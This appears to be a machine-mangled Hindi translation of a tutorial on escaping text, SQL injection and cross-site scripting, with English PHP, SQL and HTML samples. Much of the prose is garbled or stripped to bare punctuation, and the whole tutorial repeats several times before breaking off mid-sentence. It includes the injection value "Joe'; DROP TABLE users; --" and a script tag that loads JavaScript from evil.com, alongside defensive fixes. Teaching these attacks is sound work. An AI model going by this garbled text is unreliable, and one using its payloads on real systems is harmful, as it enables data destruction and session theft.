SQL рдЗрдВрдЬреЗрдХреНрд╢рди, рдХреНрд░реЙрд╕-рд╕рд╛рдЗрдЯ рдХреНрд╡реЗрд░реА рдЬрд╛рд▓рд╕рд╛рдЬреА, рджреВрд╖рд┐рдд XML ... рдбрд░рд╛рд╡рдиреА, рдбрд░рд╛рд╡рдиреА рдЪреАрдЬреЗрдВ рдЬреЛ рд╣рдо рд╕рднреА рдЦреБрдж рдХреЛ рд╕реБрд░рдХреНрд╖рд┐рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдпрд╣ рдЬрд╛рдирдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдпрд╣ рд╕рдм рдХреНрдпреЛрдВ рд╣реЛрддрд╛ рд╣реИред рдпрд╣ рд▓реЗрдЦ рдЗрд╕ рд╕рдмрдХреЗ рдкреАрдЫреЗ рдореВрд▓ рдЕрд╡рдзрд╛рд░рдгрд╛ рдХреА рд╡реНрдпрд╛рдЦреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ: рддрд╛рд░ рдФрд░ рддрд╛рд░ рдХреЗ рднреАрддрд░ рддрд╛рд░ рдХрд╛ рдкреНрд░рд╕рдВрд╕реНрдХрд░рдгред
рдореБрдЦреНрдп рд╕рдорд╕реНрдпрд╛
рдпрд╣ рд╕рд┐рд░реНрдл рдкрд╛рда рд╣реИред рд╣рд╛рдВ, рдмрд╕ рдкрд╛рда - рдпрд╣ рдореБрдЦреНрдп рд╕рдорд╕реНрдпрд╛ рд╣реИред рдХрдВрдкреНрдпреВрдЯрд░ рдкреНрд░рдгрд╛рд▓реА рдореЗрдВ рд▓рдЧрднрдЧ рд╕рдм рдХреБрдЫ рдкрд╛рда рджреНрд╡рд╛рд░рд╛ рджрд░реНрд╢рд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ (рдЬреЛ рдмрджрд▓реЗ рдореЗрдВ, рдмрд╛рдЗрдЯреНрд╕ рджреНрд╡рд╛рд░рд╛ рджрд░реНрд╢рд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ)ред рдЬрдм рддрдХ рдХреБрдЫ рдкрд╛рда рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рд▓рд┐рдП, рдФрд░ рдЕрдиреНрдп - рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЕрднрд┐рдкреНрд░реЗрдд рдирд╣реАрдВ рд╣реИрдВред рд▓реЗрдХрд┐рди рд╡реЗ рдФрд░ рд╡реЗ рджреЛрдиреЛрдВ рдЕрднреА рднреА рдкрд╛рда рдмрдиреЗ рд╣реБрдП рд╣реИрдВред рдпрд╣ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдореИрдВ рдХрд┐рд╕ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╛рдд рдХрд░ рд░рд╣рд╛ рд╣реВрдВ, рдореИрдВ рдПрдХ рдЫреЛрдЯрд╛ рд╕рд╛ рдЙрджрд╛рд╣рд░рдг рджреВрдВрдЧрд╛:
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Suppose, there is the English text, which I don't wanna translate into Russian </contents> </article>
рдЗрд╕ рдкрд░ рд╡рд┐рд╢реНрд╡рд╛рд╕ рди рдХрд░реЗрдВ: рдпрд╣ рдкрд╛рда рд╣реИред рдХреБрдЫ рд▓реЛрдЧ рдЗрд╕реЗ рдПрдХреНрд╕рдПрдордПрд▓ рдХрд╣рддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдпрд╣ рд╕рд┐рд░реНрдл рдкрд╛рда рд╣реИред рдпрд╣ рдПрдХ рдЕрдВрдЧреНрд░реЗрдЬреА рд╢рд┐рдХреНрд╖рдХ рдХреЛ рджрд┐рдЦрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреБрдХреНрдд рдирд╣реАрдВ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ рдЕрднреА рднреА рдПрдХ рдкрд╛рда рд╣реИред рдЖрдк рдЗрд╕реЗ рдПрдХ рдкреЛрд╕реНрдЯрд░ рдкрд░ рдкреНрд░рд┐рдВрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕рдХреЗ рд╕рд╛рде рдмреИрдардХреЛрдВ рдореЗрдВ рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдЖрдк рдЗрд╕реЗ рдЕрдкрдиреА рдорд╛рдВ рдХреЛ рдПрдХ рдкрддреНрд░ рдореЗрдВ рд▓рд┐рдЦ рд╕рдХрддреЗ рд╣реИрдВ ... рдпрд╣ рдкрд╛рда рд╣реИред
рд╣рд╛рд▓рд╛рдБрдХрд┐, рд╣рдо рдЗрд╕ рдкрд╛рда рдХреЗ рдХреБрдЫ рднрд╛рдЧреЛрдВ рдХреЛ рдЕрдкрдиреЗ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рд▓рд┐рдП рдХреБрдЫ рдЕрд░реНрде рджреЗрдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред рд╣рдо рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдХрд┐ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд╛рда рдХреЗ рд▓реЗрдЦрдХ рдФрд░ рдкрд╛рда рдХреЛ рдЕрд▓рдЧ рд╕реЗ рдирд┐рдХрд╛рд▓рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛ рддрд╛рдХрд┐ рдЗрд╕рдХреЗ рд╕рд╛рде рдХреБрдЫ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдЙрдкрд░реЛрдХреНрдд рдХреЛ рдЗрд╕рдореЗрдВ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд░реЗрдВ:
Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens
рдХрдВрдкреНрдпреВрдЯрд░ рдпрд╣ рдХреИрд╕реЗ рдХрд░рдирд╛ рдЬрд╛рдирддрд╛ рд╣реИ? рдЦреИрд░, рдХреНрдпреЛрдВрдХрд┐ рд╣рдордиреЗ рдкрд╛рда рдХреЗ рдХреБрдЫ рд╣рд┐рд╕реНрд╕реЛрдВ рдХреЛ рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдордЬрд╛рдХрд┐рдпрд╛ рдХреЛрд╖реНрдардХ рдореЗрдВ рд╡рд┐рд╢реЗрд╖ рд╢рдмреНрджреЛрдВ рдХреЗ рд╕рд╛рде рд▓рдкреЗрдЯрд╛ рд╣реИ, рдЬреИрд╕реЗ рдХрд┐
ред рдЪреВрдВрдХрд┐ рд╣рдордиреЗ рдРрд╕рд╛ рдХрд┐рдпрд╛ рд╣реИ, рд╣рдо рдПрдХ рдкреНрд░реЛрдЧреНрд░рд╛рдо рд▓рд┐рдЦ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдЗрди рд╡рд┐рд╢рд┐рд╖реНрдЯ рднрд╛рдЧреЛрдВ рдХреА рдЦреЛрдЬ рдХрд░рддрд╛ рд╣реИ, рдкрд╛рда рдХреЛ рдирд┐рдХрд╛рд▓рддрд╛ рд╣реИ, рдФрд░ рд╣рдорд╛рд░реЗ рдХреБрдЫ рдЖрд╡рд┐рд╖реНрдХрд╛рд░реЛрдВ рдХреЗ рд▓рд┐рдП рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред
рджреВрд╕рд░реЗ рд╢рдмреНрджреЛрдВ рдореЗрдВ, рд╣рдордиреЗ рдЕрдкрдиреЗ рдкрд╛рда рдореЗрдВ рдХреБрдЫ рд╡рд┐рд╢реЗрд╖ рдЕрд░реНрдереЛрдВ рдХреЛ рдЗрдВрдЧрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреБрдЫ рдирд┐рдпрдореЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рд╣реИ рдЬреЛ рдХрд┐ рдХреЛрдИ рд╡реНрдпрдХреНрддрд┐, рд╕рдорд╛рди рдирд┐рдпрдореЛрдВ рдХрд╛ рдЕрд╡рд▓реЛрдХрди рдХрд░ рд╕рдХрддрд╛ рд╣реИред
рдареАрдХ рд╣реИ, рдпрд╣ рд╕рдм рд╕рдордЭрдирд╛ рдореБрд╢реНрдХрд┐рд▓ рдирд╣реАрдВ рд╣реИред рд▓реЗрдХрд┐рди рдХреНрдпрд╛ рд╣реЛрдЧрд╛ рдЕрдЧрд░ рд╣рдо рдЗрди рдЕрдЬреАрдм рдХреЛрд╖реНрдардХреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдЬреЛ рд╣рдорд╛рд░реЗ рдкрд╛рда рдореЗрдВ рдХреБрдЫ рд╡рд┐рд╢реЗрд╖ рдЕрд░реНрде рд░рдЦрддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдЗрд╕ рдмрд╣реБрдд рдореВрд▓реНрдп рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдмрд┐рдирд╛? .. рдХреБрдЫ рдЗрд╕ рддрд░рд╣ рд╕реЗ:
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
"<" рдФрд░ ">" рдЕрдХреНрд╖рд░ рдХреБрдЫ рдЦрд╛рд╕ рдирд╣реАрдВ рд╣реИрдВред рд╡реЗ рдХрд┐рд╕реА рднреА рдкрд╛рда рдореЗрдВ рдХрд╣реАрдВ рднреА рд╡реИрдз рд░реВрдк рд╕реЗ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреИрд╕рд╛ рдХрд┐ рдКрдкрд░ рджрд┐рдП рдЧрдП рдЙрджрд╛рд╣рд░рдг рдореЗрдВ рд╣реИред рд▓реЗрдХрд┐рди рд╡рд┐рд╢реЗрд╖ рд╢рдмреНрджреЛрдВ рдХреЗ рд╣рдорд╛рд░реЗ рд╡рд┐рдЪрд╛рд░ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдХреНрдпрд╛
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
